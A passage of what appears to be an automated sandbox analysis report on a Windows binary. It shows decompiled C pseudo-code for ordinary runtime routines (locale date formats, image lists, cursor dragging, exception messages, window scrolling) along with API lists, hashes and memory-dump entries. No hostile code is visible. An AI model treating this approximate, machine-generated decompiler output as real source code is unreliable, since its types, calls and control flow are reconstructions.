					while(1) {
						_t41 = E00404600(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x47a0c0], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408D38(_t124 + _t92 - 1, 2, 0x409ef0);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408D38(_t124 + _t92 - 1, 4, 0x409f00);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408D38(_t124 + _t92 - 1, 2, 0x409f18);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404608(_t122, 0x409f30);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404528();
												E00404608(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404608(_t122, 0x409f24);
										_t92 = _t92 + 1;
									}
								} else {
									E00404608(_t122, 0x409f10);
									_t92 = _t92 + 3;
								}
							} else {
								E00404608(_t122, 0x409efc);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040AA54(_t124, _t92);
							E00404858(_t124, _v8, _t92,  &_v20);
							E00404608(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x4967f4; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E0040439C(_t122, _t124);
					} else {
						while(_t92 <= E00404600(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404528();
									E00404608(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409EDD);
				return E0040436C( &_v24, 4);
			}























                                                                        0x00409d0c
                                                                        0x00409d11
                                                                        0x00409d12
                                                                        0x00409d13
                                                                        0x00409d14
                                                                        0x00409d15
                                                                        0x00409d19
                                                                        0x00409d1b
                                                                        0x00409d1f
                                                                        0x00409d20
                                                                        0x00409d25
                                                                        0x00409d28
                                                                        0x00409d2b
                                                                        0x00409d32
                                                                        0x00409d4a
                                                                        0x00409d62
                                                                        0x00409eac
                                                                        0x00409eae
                                                                        0x00409eb3
                                                                        0x00409eb5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00409dcb
                                                                        0x00409dd0
                                                                        0x00409dd7
                                                                        0x00409e15
                                                                        0x00409e1a
                                                                        0x00409e1c
                                                                        0x00409e3b
                                                                        0x00409e40
                                                                        0x00409e42
                                                                        0x00409e63
                                                                        0x00409e68
                                                                        0x00409e6a
                                                                        0x00409e7f
                                                                        0x00409e7f
                                                                        0x00409e81
                                                                        0x00409e87
                                                                        0x00409e8e
                                                                        0x00409e83
                                                                        0x00409e83
                                                                        0x00409e85
                                                                        0x00409e9c
                                                                        0x00409ea6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00409e85
                                                                        0x00409e6c
                                                                        0x00409e73
                                                                        0x00409e78
                                                                        0x00409e78
                                                                        0x00409e44
                                                                        0x00409e4b
                                                                        0x00409e50
                                                                        0x00409e50
                                                                        0x00409e1e
                                                                        0x00409e25
                                                                        0x00409e2a
                                                                        0x00409e2a
                                                                        0x00409eab
                                                                        0x00409eab
                                                                        0x00409dd9
                                                                        0x00409de2
                                                                        0x00409df0
                                                                        0x00409dfa
                                                                        0x00409dff
                                                                        0x00409dff
                                                                        0x00409dd7
                                                                        0x00409d68
                                                                        0x00409d68
                                                                        0x00409d6d
                                                                        0x00409d70
                                                                        0x00409d7e
                                                                        0x00409d7a
                                                                        0x00409d7a
                                                                        0x00409d7a
                                                                        0x00409d82
                                                                        0x00409dbd
                                                                        0x00409d84
                                                                        0x00409da9
                                                                        0x00409d8a
                                                                        0x00409d8a
                                                                        0x00409d8c
                                                                        0x00409d8e
                                                                        0x00409d90
                                                                        0x00409d99
                                                                        0x00409da3
                                                                        0x00409da3
                                                                        0x00409d90
                                                                        0x00409da8
                                                                        0x00409da8
                                                                        0x00409da8
                                                                        0x00409db4
                                                                        0x00409d82
                                                                        0x00409ebb
                                                                        0x00409ebd
                                                                        0x00409ec0
                                                                        0x00409ec3
                                                                        0x00409ed5

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409ED6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409D3B
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: eeee$ggg$yyyy
                                                                        • API String ID: 4232894706-1253427255
                                                                        • Opcode ID: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction ID: b6f270290c82287ec602cd9da47892ec98d791b565545ab25068ff88157d7675
                                                                        • Opcode Fuzzy Hash: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction Fuzzy Hash: B041F3743041054BC711EAA9C8816BFB395DFC5308B64483BE582F33D7EA3DAC0296AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00443F90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 60%
                                                                        			E00443F90(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v36;
				intOrPtr _t69;
				void* _t90;
				intOrPtr _t108;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				intOrPtr _t122;

				_t120 = _t121;
				_t122 = _t121 + 0xffffffe0;
				_v12 = __edx;
				_v8 = __eax;
				E00412BCC( *((intOrPtr*)(_v8 + 0x34)), 0,  &_v36,  *((intOrPtr*)(_v8 + 0x30)));
				E00444A0C(_v8);
				 *[fs:eax] = _t122;
				_v16 = E004242CC(1);
				 *[fs:eax] = _t122;
				 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x4440fb, _t120,  *[fs:eax], 0x444118, _t120, __edi, __esi, __ebx, _t119);
				 *((intOrPtr*)( *_v16 + 0x40))();
				_v20 = E004242CC(1);
				 *[fs:eax] = _t122;
				E004256E4(_v20, 1);
				 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x4440de, _t120);
				 *((intOrPtr*)( *_v20 + 0x40))();
				_t69 = _v12;
				_push(_t69);
				L00426AA0();
				_t117 = _t69 - 1;
				if(_t117 >= 0) {
					_t118 = _t117 + 1;
					_t90 = 0;
					do {
						E004202E8(E00424894(_v16),  &_v36);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420730(_t74));
						_push(_t90);
						_push(_v12);
						L00426AD8();
						E004202E8(E00424894(_v20),  &_v36);
						_push(0x10);
						_push(0);
						_push(0);
						_push(E00420730(_t81));
						_push(_t90);
						_push(_v12);
						L00426AD8();
						E00443820(_v8, _t90, _v20, _v16, _t118, 0);
						_t90 = _t90 + 1;
						_t118 = _t118 - 1;
					} while (_t118 != 0);
				}
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x4440e5);
				return E004035DC(_v20);
			}

















                                                                        0x00443f91
                                                                        0x00443f93
                                                                        0x00443f99
                                                                        0x00443f9c
                                                                        0x00443fb4
                                                                        0x00443fbc
                                                                        0x00443fcc
                                                                        0x00443fdb
                                                                        0x00443fe9
                                                                        0x00443ff7
                                                                        0x00444005
                                                                        0x00444014
                                                                        0x00444022
                                                                        0x0044402a
                                                                        0x0044403a
                                                                        0x00444048
                                                                        0x0044404b
                                                                        0x0044404e
                                                                        0x0044404f
                                                                        0x00444056
                                                                        0x00444059
                                                                        0x0044405b
                                                                        0x0044405c
                                                                        0x0044405e
                                                                        0x0044406d
                                                                        0x00444072
                                                                        0x00444074
                                                                        0x00444076
                                                                        0x0044407f
                                                                        0x00444080
                                                                        0x00444084
                                                                        0x00444085
                                                                        0x00444099
                                                                        0x0044409e
                                                                        0x004440a0
                                                                        0x004440a2
                                                                        0x004440ab
                                                                        0x004440ac
                                                                        0x004440b0
                                                                        0x004440b1
                                                                        0x004440bf
                                                                        0x004440c4
                                                                        0x004440c5
                                                                        0x004440c5
                                                                        0x0044405e
                                                                        0x004440ca
                                                                        0x004440cd
                                                                        0x004440d0
                                                                        0x004440dd

                                                                        APIs
                                                                        • 73451FD0.COMCTL32(?,?,?,00000000,00444118), ref: 0044404F
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00444118), ref: 00444085
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 004440B1
                                                                          • Part of subcall function 00443820: 734520C0.COMCTL32(?,00000000,00000000,00000000,004438B2,?,00000000,004438CF), ref: 00443894
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 73452500$73451734520FillRect
                                                                        • String ID: DA
                                                                        • API String ID: 3869139703-2080325668
                                                                        • Opcode ID: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
                                                                        • Instruction ID: 274bc86385f0dda2e4b4f1d6e4670416b346b4c3e9b855bbcb09a17cbb89921f
                                                                        • Opcode Fuzzy Hash: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
                                                                        • Instruction Fuzzy Hash: 16411E74B00214AFDB01EFA6C891E9EB7F9FB89704F5144A6F800EB751CA75AD01CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043478C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 85%
                                                                        			E0043478C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HWND__* _t37;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr* _t52;
				long _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr* _t76;
				void* _t78;
				intOrPtr* _t79;
				long long _t86;

				_t86 = __fp0;
				_t79 = _t78 + 0xfffffff8;
				_t69 = __ecx;
				_t44 = __edx;
				_t76 = __eax;
				 *0x496b8c = __eax;
				_t24 =  *0x496b8c; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x496b98);
				_t26 =  *0x496b8c; // 0x0
				_t57 = 0x496b98->x; // 0x0
				 *(_t26 + 0xc) = _t57;
				_t58 =  *0x496b9c; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t58;
				 *0x496ba0 = GetCursor();
				_t28 =  *0x496b8c; // 0x0
				"SPhP;C"();
				 *0x496b94 = _t28;
				 *0x496ba4 = _t69;
				_t59 =  *0x4311cc; // 0x431218
				if(E00403768(_t76, _t59) == 0) {
					__eflags = _t44;
					if(__eflags == 0) {
						 *0x496ba8 = 0;
					} else {
						 *0x496ba8 = 1;
					}
				} else {
					_t64 = _t76;
					_t4 = _t64 + 0x44; // 0x44
					_t40 = _t4;
					_t48 =  *_t40;
					if( *((intOrPtr*)(_t40 + 8)) - _t48 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t64 + 0x20)) = 0;
						 *((intOrPtr*)(_t64 + 0x24)) = 0;
					} else {
						 *_t79 =  *((intOrPtr*)(_t64 + 0xc)) - _t48;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 8)) -  *_t40;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t64 + 0x20)) = __fp0;
						asm("wait");
					}
					_t65 =  *((intOrPtr*)(_t40 + 4));
					if( *((intOrPtr*)(_t40 + 0xc)) - _t65 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t76 + 0x28)) = 0;
						 *((intOrPtr*)(_t76 + 0x2c)) = 0;
					} else {
						_t52 = _t76;
						 *_t79 =  *((intOrPtr*)(_t52 + 0x10)) - _t65;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t40 + 0xc)) -  *((intOrPtr*)(_t40 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t52 + 0x28)) = _t86;
						asm("wait");
					}
					if(_t44 == 0) {
						 *0x496ba8 = 0;
					} else {
						 *0x496ba8 = 2;
						 *((intOrPtr*)( *_t76 + 0x30))();
					}
				}
				_t31 =  *0x496b8c; // 0x0
				 *0x496bac =  *((intOrPtr*)( *_t31 + 8))();
				_t84 =  *0x496bac;
				if( *0x496bac != 0) {
					_t36 =  *0x496b9c; // 0x0
					_t37 = GetDesktopWindow();
					_t38 =  *0x496bac; // 0x0
					E0043E5DC(_t38, _t37, _t84, _t36);
				}
				_t34 = E004035AC(1);
				 *0x496bb4 = _t34;
				if( *0x496ba8 != 0) {
					_t34 = E004344BC(0x496b98, 1);
				}
				return _t34;
			}


























                                                                        0x0043478c
                                                                        0x0043478f
                                                                        0x00434792
                                                                        0x00434794
                                                                        0x00434796
                                                                        0x00434798
                                                                        0x0043479e
                                                                        0x004347a5
                                                                        0x004347ad
                                                                        0x004347b2
                                                                        0x004347b7
                                                                        0x004347bd
                                                                        0x004347c0
                                                                        0x004347c6
                                                                        0x004347ce
                                                                        0x004347d3
                                                                        0x004347d8
                                                                        0x004347dd
                                                                        0x004347e2
                                                                        0x004347ea
                                                                        0x004347f7
                                                                        0x00434889
                                                                        0x0043488b
                                                                        0x00434896
                                                                        0x0043488d
                                                                        0x0043488d
                                                                        0x0043488d
                                                                        0x004347fd
                                                                        0x004347fd
                                                                        0x004347ff
                                                                        0x004347ff
                                                                        0x00434805
                                                                        0x0043480b
                                                                        0x0043482d
                                                                        0x0043482f
                                                                        0x00434832
                                                                        0x0043480d
                                                                        0x00434812
                                                                        0x00434815
                                                                        0x0043481d
                                                                        0x00434821
                                                                        0x00434825
                                                                        0x00434827
                                                                        0x0043482a
                                                                        0x0043482a
                                                                        0x00434838
                                                                        0x0043483f
                                                                        0x00434864
                                                                        0x00434866
                                                                        0x00434869
                                                                        0x00434841
                                                                        0x00434841
                                                                        0x00434848
                                                                        0x0043484b
                                                                        0x00434854
                                                                        0x00434858
                                                                        0x0043485c
                                                                        0x0043485e
                                                                        0x00434861
                                                                        0x00434861
                                                                        0x0043486e
                                                                        0x00434880
                                                                        0x00434870
                                                                        0x00434870
                                                                        0x0043487b
                                                                        0x0043487b
                                                                        0x0043486e
                                                                        0x0043489d
                                                                        0x004348a7
                                                                        0x004348ac
                                                                        0x004348b3
                                                                        0x004348b5
                                                                        0x004348bb
                                                                        0x004348c8
                                                                        0x004348cd
                                                                        0x004348cd
                                                                        0x004348d9
                                                                        0x004348de
                                                                        0x004348ea
                                                                        0x004348f1
                                                                        0x004348f1
                                                                        0x004348fb

                                                                        APIs
                                                                        • GetCursorPos.USER32(00496B98), ref: 004347AD
                                                                        • GetCursor.USER32(00496B98), ref: 004347C9
                                                                          • Part of subcall function 004339CC: SetCapture.USER32(00000000,?,004347DD,00496B98), ref: 004339DB
                                                                        • GetDesktopWindow.USER32 ref: 004348BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Cursor$CaptureDesktopWindow
                                                                        • String ID: 8C
                                                                        • API String ID: 669539147-1061565219
                                                                        • Opcode ID: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction ID: 23d7adcb388defc9bd6fa9e8aedec287cf5aea9bdfeb159da65cc808b88cf330
                                                                        • Opcode Fuzzy Hash: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction Fuzzy Hash: CB416AB46042508FC708EF69E944656BBE1ABD8318F26C57FD449CB3A2EB35F841CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A590, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E0040A590(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				char _v297;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				void* _v332;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v356;
				char _v360;
				char _v364;
				void* _v368;
				char _v372;
				intOrPtr _t52;
				intOrPtr _t60;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				intOrPtr _t101;
				void* _t108;
				intOrPtr _t110;
				void* _t113;

				_t108 = __edi;
				_v372 = 0;
				_v336 = 0;
				_v344 = 0;
				_v340 = 0;
				_v8 = 0;
				_push(_t113);
				_push(0x40a74b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t113 + 0xfffffe90;
				_t89 =  *((intOrPtr*)(_a4 - 4));
				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
					_t52 =  *0x495ad4; // 0x4075d4
					E00406548(_t52,  &_v8);
				} else {
					_t86 =  *0x495c54; // 0x4075cc
					E00406548(_t86,  &_v8);
				}
				_t110 =  *((intOrPtr*)(_t89 + 0x18));
				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
					_v368 =  *(_t89 + 0xc);
					_v364 = 5;
					_v360 = _v8;
					_v356 = 0xb;
					_v352 = _t110;
					_v348 = 5;
					_t60 =  *0x495ba8; // 0x407574
					E00406548(_t60,  &_v372);
					E0040A1B8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
				} else {
					_v332 =  *(_t89 + 0xc);
					_v328 = 5;
					E004045B0( &_v340, 0x105,  &_v297);
					E00408AC8(_v340,  &_v336);
					_v324 = _v336;
					_v320 = 0xb;
					_v316 = _v8;
					_v312 = 0xb;
					_v308 = _t110;
					_v304 = 5;
					_t82 =  *0x495b4c; // 0x407624
					E00406548(_t82,  &_v344);
					E0040A1B8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A752);
				E00404348( &_v372);
				E0040436C( &_v344, 3);
				return E00404348( &_v8);
			}

































                                                                        0x0040a590
                                                                        0x0040a59d
                                                                        0x0040a5a3
                                                                        0x0040a5a9
                                                                        0x0040a5af
                                                                        0x0040a5b5
                                                                        0x0040a5ba
                                                                        0x0040a5bb
                                                                        0x0040a5c0
                                                                        0x0040a5c3
                                                                        0x0040a5c9
                                                                        0x0040a5d0
                                                                        0x0040a5e4
                                                                        0x0040a5e9
                                                                        0x0040a5d2
                                                                        0x0040a5d5
                                                                        0x0040a5da
                                                                        0x0040a5da
                                                                        0x0040a5ee
                                                                        0x0040a5fb
                                                                        0x0040a607
                                                                        0x0040a6c3
                                                                        0x0040a6c9
                                                                        0x0040a6d3
                                                                        0x0040a6d9
                                                                        0x0040a6e0
                                                                        0x0040a6e6
                                                                        0x0040a6fc
                                                                        0x0040a701
                                                                        0x0040a713
                                                                        0x0040a62a
                                                                        0x0040a62d
                                                                        0x0040a633
                                                                        0x0040a64b
                                                                        0x0040a65c
                                                                        0x0040a667
                                                                        0x0040a66d
                                                                        0x0040a677
                                                                        0x0040a67d
                                                                        0x0040a684
                                                                        0x0040a68a
                                                                        0x0040a6a0
                                                                        0x0040a6a5
                                                                        0x0040a6b7
                                                                        0x0040a6bc
                                                                        0x0040a71c
                                                                        0x0040a71f
                                                                        0x0040a722
                                                                        0x0040a72d
                                                                        0x0040a73d
                                                                        0x0040a74a

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A74B), ref: 0040A5FB
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A74B), ref: 0040A61D
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileLoadModuleNameQueryStringVirtual
                                                                        • String ID: $v@$tu@
                                                                        • API String ID: 902310565-2066366626
                                                                        • Opcode ID: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction ID: b8250315685de19ce3eef807cd591484c91ae11c3ead26debf93d0050c9e99c4
                                                                        • Opcode Fuzzy Hash: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction Fuzzy Hash: B0410470900628DFDB61DF64CC85BDAB7F4AB49304F4140EAE908AB391D778AE84CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043C824, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043C824(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
				char _t23;
				struct HWND__* _t42;
				void* _t43;
				intOrPtr _t47;
				void* _t54;
				void* _t56;
				void* _t57;
				void* _t58;
				intOrPtr* _t59;

				 *((intOrPtr*)(_t59 + 4)) = __ecx;
				 *_t59 = __edx;
				_t54 = __eax;
				_t42 =  *(__eax + 0x180);
				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
					_t23 = 0;
				} else {
					_t23 = 1;
				}
				 *((char*)(_t59 + 8)) = _t23;
				if( *((char*)(_t59 + 8)) != 0) {
					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
				}
				_t56 = E00439AB4(_t54) - 1;
				if(_t56 < 0) {
					L14:
					return E00439644();
				} else {
					_t57 = _t56 + 1;
					_t58 = 0;
					do {
						_t43 = E00439A78(_t54, _t58);
						_t47 =  *0x4323f0; // 0x43243c
						if(E00403768(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
						} else {
							if( *((char*)(_t59 + 8)) == 0) {
								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
							}
						}
						_t58 = _t58 + 1;
						_t57 = _t57 - 1;
					} while (_t57 != 0);
					goto L14;
				}
			}












                                                                        0x0043c82b
                                                                        0x0043c82f
                                                                        0x0043c832
                                                                        0x0043c834
                                                                        0x0043c83c
                                                                        0x0043c848
                                                                        0x0043c84c
                                                                        0x0043c84c
                                                                        0x0043c84c
                                                                        0x0043c84e
                                                                        0x0043c857
                                                                        0x0043c86e
                                                                        0x0043c86e
                                                                        0x0043c87c
                                                                        0x0043c87f
                                                                        0x0043c8ed
                                                                        0x0043c8fb
                                                                        0x0043c881
                                                                        0x0043c881
                                                                        0x0043c882
                                                                        0x0043c884
                                                                        0x0043c88d
                                                                        0x0043c891
                                                                        0x0043c89e
                                                                        0x0043c8ac
                                                                        0x0043c8b3
                                                                        0x0043c8b8
                                                                        0x0043c8bd
                                                                        0x0043c8e4
                                                                        0x0043c8e4
                                                                        0x0043c8bd
                                                                        0x0043c8e9
                                                                        0x0043c8ea
                                                                        0x0043c8ea
                                                                        0x00000000
                                                                        0x0043c884

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0043C83F
                                                                        • ScrollWindow.USER32 ref: 0043C86E
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043C8E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$ScrollVisible
                                                                        • String ID: <$C
                                                                        • API String ID: 4127837035-3423417450
                                                                        • Opcode ID: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction ID: 2152d0f343ca8ced43e7147e59c3894d671bac6e37dc3256dc1c566f4991c98f
                                                                        • Opcode Fuzzy Hash: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction Fuzzy Hash: CD21DB31604340ABC714EA69CCC0B6BB7E8AF8C305F14956EF648DB352D638ED01879A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0046CC50, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 45%
                                                                        			E0046CC50(void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				void* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;

				_t51 = _t52;
				_t53 = _t52 + 0xffffffec;
				_v8 = 0;
				_push(_t51);
				_push(0x46cd28);
				_push( *[fs:eax]);
				 *[fs:eax] = _t53;
				if( *0x496c98 != 0) {
					L6:
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(0x46cd2f);
					return E00404348( &_v8);
				} else {
					E004043E0( &_v8, "comctl32.dll");
					_push( &_v12);
					_t24 = E004047F8(_v8);
